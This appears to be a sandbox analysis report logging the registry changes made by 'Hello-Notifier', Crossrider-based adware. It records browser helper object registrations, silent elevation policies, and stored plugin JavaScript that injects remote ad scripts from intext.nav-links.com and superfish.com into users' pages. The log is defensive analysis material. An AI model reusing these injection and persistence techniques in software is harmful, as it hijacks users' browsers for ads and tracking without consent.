Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\Policy = "3" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\123\JavaScript = "\n//------------------ PLUGIN intext_adv_m START ------------------\nif (typeof appAPI.internal.monetization === \"undefined\") { appAPI.internal.monetization = {}; }\nif (typeof appAPI.internal.monetization.plugins === \"undefined\") { appAPI.internal.monetization.plugins = {}; }\n\nappAPI.internal.monetization.plugins[123] = function() {\n\n if (!appAPI.internal.monetization.shouldRunByVertical(123, [\"intext\"])){\n return;\n }\n\n\t// boris don't want it on youtube for shop helper\n\tif (appAPI.appID == 33256 && appAPI.dom.location.href.indexOf(\"youtube.com\") !== -1) {\n\t\treturn;\n\t}\n\n\tif (!appAPI.dom.isHttps()) {\n\t\tappAPI.dom.addRemoteJS(\"http://intext.nav-links.com/js/intext.js?afid=crossrider&subid=\" + appAPI.internal.monetization.getSubId() + \"&maxlinks=8&linkcolor=#0000FF\");\n\t}\n};\n//------------------ PLUGIN intext_adv_m END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\4\Version = "4" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\207 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\183\Name = "tabsWrapper" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\39\Url = "http://app-static.crossrider.com/plugins/mins/ie/IEDatabase.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\38\Name = "IECallbacks" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\13\Url = "http://app-static.crossrider.com/plugins/mins/CrossriderAppUtils.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho.dll" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Crossrider C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\Params = "{\n \"source_id\" : \"000249\",\n \"sub_id\" : \"0\",\n \"uzid\" : \"0\"\n}\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\43\Version = "5" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\102\Version = "5" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\64\Url = "http://app-static.crossrider.com/plugins/mins/appApiMessage.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\42\Version = "9" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\Name = "hooks" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\PopupPluginList = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho64.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\UpdateInterval = "360" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\17 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CurVer\ = "CrossriderApp0037928.Sandbox" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\JavaScript = "\n//------------------ PLUGIN hooks START ------------------\nappAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};\n//------------------ PLUGIN hooks END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CurVer\ = "CrossriderApp0037928.Sandbox" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\FullVersionForUrl = "1_34_1_29" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\SrcId = "000249" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\Manifest = "NA" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\183\Url = "http://app-static.crossrider.com/plugins/mins/tabsWrapper.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\125\Url = "http://app-static.crossrider.com/plugins/javascripts/monetization/geo/arcadi2_m.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{55555555-5555-5555-5555-550355795528}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\104 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\93\JavaScript = "\n//------------------ PLUGIN superfish_no_coupons_m START ------------------\nif(typeof appAPI.internal.monetization===\"undefined\"){appAPI.internal.monetization={};}if(typeof appAPI.internal.monetization.plugins===\"undefined\"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[93]=function(){if(typeof appAPI.internal.monetization.verticals!==\"undefined\"){if(!appAPI.internal.monetization.verticals.shopping){return;}}try{if(!appAPI.dom.isHttps()){appAPI.dom.addRemoteJS({url:\"http://www.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=\"+appAPI.internal.monetization.getSubId()});}}catch(a){throw new Error(\"something_went_wrong_in_superfish_\"+a.message);}};\n//------------------ PLUGIN superfish_no_coupons_m END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\93\Url = "http://app-static.crossrider.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\14\JavaScript = "\n//------------------ PLUGIN CrossriderUtils START ------------------\nif(typeof(appAPI)===\"undefined\"){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==\"undefined\"&&typeof window.navigator!==\"undefined\"&&typeof window.navigator.userAgent!==\"undefined\"){CR__bIsIEWindow=/MSIE (\\d+\\.\\d+);/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==\"undefined\"));appAPI.JSON={};if(typeof JSON!==\"undefined\"&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?\"0\"+n:n;}if(typeof Date.prototype.to_CR_JSON!==\"function\"){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear()+\"-\"+f(this.getUTCMonth()+1)+\"-\"+f(this.getUTCDate())+\"T\"+f(this.getUTCHours())+\":\"+f(this.getUTCMinutes())+\":\"+f(this.getUTCSeconds())+\"Z\":null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,escapable=/[\\\\\\\"\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,gap,indent,meta={\"\\b\":\"\\\\b\",\"\\t\":\"\\\\t\",\"\\n\":\"\\\\n\",\"\\f\":\"\\\\f\",\"\\r\":\"\\\\r\",'\"':'\\\\\"',\"\\\\\":\"\\\\\\\\\"},rep;function quote(string){escapable.lastIndex=0;return escapable.test(string)?'\"'+string.replace(escapable,function(a){var c=meta[a];return typeof c===\"string\"?c:\"\\\\u\"+(\"0000\"+a.charCodeAt(0).toString(16)).slice(-4);})+'\"':'\"'+string+'\"';}function str(key,holder){var i,k,v,length,mind=gap,partial,value=holder[key];if(value&&typeof value===\"object\"&&typeof value.to_CR_JSON===\"function\"){value=value.to_CR_JSON(key);}if(typeof rep===\"function\"){value=rep.call(holder,key,value);}switch(typeof value){case\"string\":return quote(value);case\"number\":return isFinite(value)?String(value):\"null\";case\"boolean\":case\"null\":return String(value);case\"object\":if(!value){return\"null\";}gap+=indent;partial=[];if(Object.prototype.toString.apply(value)===\"[object Array]\"){length=value.length;for(i=0;i<length;i+=1){partial[i]=str(i,value)||\"null\";}v=partial.length===0?\"[]\":gap?\"[\\n\"+gap+partial.join(\",\\n\"+gap)+\"\\n\"+mind+\"]\":\"[\"+partial.join(\",\")+\"]\";gap=mind;return v;}if(rep&&typeof rep===\"object\"){length=rep.length;for(i=0;i<length;i+=1){k=rep[i];if(typeof k===\"string\"){v=str(k,value);if(v){partial.push(quote(k)+(gap?\": \":\":\")+v);}}}}else{for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=str(k,value);if(v){partial.push(quote(k)+(gap?\": \":\":\")+v);}}}}v=partial.length===0?\"{}\":gap?\"{\\n\"+gap+partial.join(\",\\n\"+gap)+\"\\n\"+mind+\"}\":\"{\"+partial.join(\",\")+\"}\";gap=mind;return v;}}if(typeof appAPI.JSON.stringify!==\"function\"){appAPI.JSON.stringify=function(value,replacer,space){var i;gap=\"\";indent=\"\";if(typeof space===\"number\"){for(i=0;i<space;i+=1){indent+=\" \";}}else{if(typeof space===\"string\"){indent=space;}}rep=replacer;if(replacer&&typeof replacer!==\"function\"&&(typeof replacer!==\"object\"||typeof replacer.length!==\"number\")){throw new Error(\"appAPI.JSON.stringify\");}return str(\"\",{\"\":value});};}if(typeof appAPI.JSON.parse!==\"function\"){appAPI.JSON.parse=function(text,reviver){var j;function walk(holder,key){var k,v,value=holder[key];if(value&&typeof value===\"object\"){for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=walk(value,k);if(v!==undefined){value[k]=v;}else{delete value[k];}}}}return reviver.call(holder,key,value);}text=String(text);cx.lastIndex=0;if(cx.test(text)){text=text.replace(cx,function(a){return\"\\\\u\"+(\"0000\"+a.charCodeAt(0).toString(16)).slice(-4);});}if(/^[\\],:{}\\s]*$/.test(text.replace(/\\\\(?:[\"\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,\"@\").replace(/\"[^\"\\\\\\n\\r]*\"|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,\"]\").replace(/(?:^|:|,)(?:\\s*\\[)+/g,\"\"))){j=eval(\"(\"+text+\")\");return typeof reviver===\"function\"?walk({\"\":j},\"\"):j;}throw new SyntaxError(\"appAPI.JSON.parse\");};}}());}(function(a){a.debug=function(h,f){if(!a.isDebugMode()){return;}var b=!a.debug.settings.console;if(f!==null){b=f;}try{if(!b){var g=new Date();var i=(((a.debug.settings.timestamp)&&(typeof(h)==\"string\"))?(g.toLocaleTimeString()+\".\"+g.getMilliseconds()+\": \"+h):h);console.log(i);}else{alert(h);}}catch(c){alert(h);}};a.debug.settings={console:true,timestamp:true};})(appAPI);(function(a){if(typeof a.installer===\"undefined\"){a.installer={};}a.installer.getParams=function(){if(appAPI.internal&&appAPI.internal.installer&&appAPI.internal.installer.installerParams&&appAPI.internal.installer.installerParams.source_id&&appAPI.internal.installer.installerParams.source_id!==\"__SOURCE_ID__\"&&appAPI.internal.installer.installerParams.sub_id&&appAPI.internal.installer.installerParams.sub_id!==\"__SUB_ID__\"&&appAPI.internal.installer.installerParams.uzid&&appAPI.internal.installer.installerParams.uzid!==\"__UZID__\"){return appAPI.internal.installer.installerParams;}return(a.db.get(\"InstallerParams\")||{});};a.installer.getUnixTime=function(){return(a.db.get(\"InstallationTime\")||null);};a.installer.getIsFirstInstall=function(){if(!appAPI.internal||!appAPI.internal.installer||!appAPI.internal.installer.isFirstInstall){return true;}else{return appAPI.internal.installer.isFirstInstall===\"__FIRST_INSTALL__\";}};a.installer.getInstallerVersion=function(){var c=\"0\";var b=appAPI.internal.db.get(\"__installer_version__\");if(appAPI.internal&&appAPI.internal.installer&&appAPI.internal.installer.version&&appAPI.internal.installer.version!==\"__INSTALLER_VERSION__\"){c=appAPI.internal.installer.version;appAPI.internal.db.set(\"__installer_version__\",appAPI.internal.installer.version);}if(b){c=b;}return c;};})(appAPI);(function(b){b.time={};b.time.now=function(){return a(0);};b.time.secondsFromNow=function(c){return a(c*1000);};b.time.secondsAgo=function(c){return a(c*-1000);};b.time.minutesFromNow=function(c){return a(c*60*1000);};b.time.minutesAgo=function(c){return a(c*60*-1000);};b.time.hoursFromNow=function(c){return a(c*3600*1000);};b.time.hoursAgo=function(c){return a(c*3600*-1000);};b.time.daysFromNow=function(c){return a(c*3600*24*1000);};b.time.daysAgo=function(c){return a(c*3600*24*-1000);};b.time.yearsFromNow=function(c){return a(c*365*3600*24*1000);};b.time.yearsAgo=function(c){return a(c*365*3600*24*-1000);};function a(c){return new Date(new Date().getTime()+c);}})(appAPI);(function(a){a.analytics={};a.analytics.trackUrl=function(b){function c(h,j,e){function o(q,i){return q+Math.floor(Math.random()*(i-q));}var l=1000000000,p=o(l,9999999999),f=o(10000000,99999999),g=o(l,2147483647),n=(new Date()).getTime(),m=window.location,k=new Image(),d=document.location.protocol+\"//www.google-analytics.com/__utm.gif?utmwv=1.3&utmn=\"+p+\"&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=\"+j+\"&utmr=\"+m+\"&utmp=\"+e+\"&utmac=\"+h+\"&utmcc=__utma%3D\"+f+\".\"+g+\".\"+n+\".\"+n+\".\"+n+\".2%3B%2B__utmb%3D\"+f+\"%3B%2B__utmc%3D\"+f+\"%3B%2B__utmz%3D\"+f+\".\"+n+\".2.2.utmccn%3D(referral)%7Cutmcsr%3D\"+m.host+\"%7Cutmcct%3D\"+m.pathname+\"%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\"+f+\".-%3B\";k.src=d;}if((this.settings.account===\"\")||(this.settings.domain===\"\")){a.debug(\"Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\");return;}c(this.settings.account,this.settings.domain,b);};a.analytics.trackEvent=function(c,e,b,d){function f(m,o,h,k,n,u,v){function t(x,i){return x+Math.floor(Math.random()*(i-x));}var q=1000000000,w=t(q,9999999999),j=t(10000000,99999999),l=t(q,2147483647),s=(new Date()).getTime(),r=window.location,p=new Image(),g=document.location.protocol+\"//www.google-analytics.com/__utm.gif?utmwv=4.8.9&utmn=\"+w+\"&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=\"+o+\"&utmr=-&utmt=event&utme=5(\"+k+\"*\"+n+\"*\"+u+\")(\"+v+\")&utmp=\"+h+\"&utmac=\"+m+\"&utmcc=__utma%3D\"+j+\".\"+l+\".\"+s+\".\"+s+\".\"+s+\".2%3B%2B__utmb%3D\"+j+\"%3B%2B__utmc%3D\"+j+\"%3B%2B__utmz%3D\"+j+\".\"+s+\".2.2.utmccn%3D(referral)%7Cutmcsr%3D\"+r.host+\"%7Cutmcct%3D\"+r.pathname+\"%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\"+j+\".-%3B\";p.src=g;}if(typeof(c)!=\"string\"){c=\"\";}if(typeof(e)!=\"string\"){e=\"\";}if(typeof(b)!=\"string\"){b=\"\";}if(typeof(d)!=\"number\"){d=0;}if((c===\"\")&&(e===\"\")&&(b===\"\")&&(d===0)){a.debug(\"Error: In order to use trackEvent you must specify the event parameters!\");return;}if((this.settings.account===\"\")||(this.settings.domain===\"\")){a.debug(\"Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\");return;}f(this.settings.account,this.settings.domain,document.location.href,c,e,b,d);};a.analytics.settings={account:\"\",domain:\"\"};})(appAPI);(function(){if(typeof appAPI===\"undefined\"){appAPI={};}if(typeof appAPI.utils===\"undefined\"){appAPI.utils={};}appAPI.utils.indexOf=function(arr,searchElement){if(!arr){return -1;}var len=arr.length;if(len===0){return -1;}if(typeof arr.indexOf!==\"undefined\"){return arr.indexOf(searchElement,arguments[2]);}var n=0;if(arguments.length>2){n=Number(arguments[2]);if(n!=n){n=0;}else{if(n!=0&&n!=Infinity&&n!=-Infinity){n=(n>0||-1)*Math.floor(Math.abs(n));}}}if(n>=len){return -1;}var k=n>=0?n:Math.max(len-Math.abs(n),0);for(;k<len;k++){if(k in arr&&arr[k]===searchElement){return k;}}return -1;};(function(){var isFactory=function(type){return function(obj){var clas=Object.prototype.toString.call(obj).slice(8,-1);return obj!==undefined&&obj!==null&&clas===type;};};var isUndefined=function(obj){return typeof obj===\"undefined\";};var isNull=function(obj){return obj===null;};appAPI.utils.isObject=isFactory(\"Object\");appAPI.utils.isNumber=isFactory(\"Number\");appAPI.utils.isString=isFactory(\"String\");appAPI.utils.isArray=isFactory(\"Array\");appAPI.utils.isBoolean=isFactory(\"Boolean\");appAPI.utils.isFunction=isFactory(\"Function\");appAPI.utils.isDefined=function(elem){return(!isUndefined(elem)&&!isNull(elem));};}());appAPI.utils.getHost=function(url){var parser=document.createElement(\"a\");parser.href=url;return parser.hostname;};appAPI.utils.getDomain=(function(){var 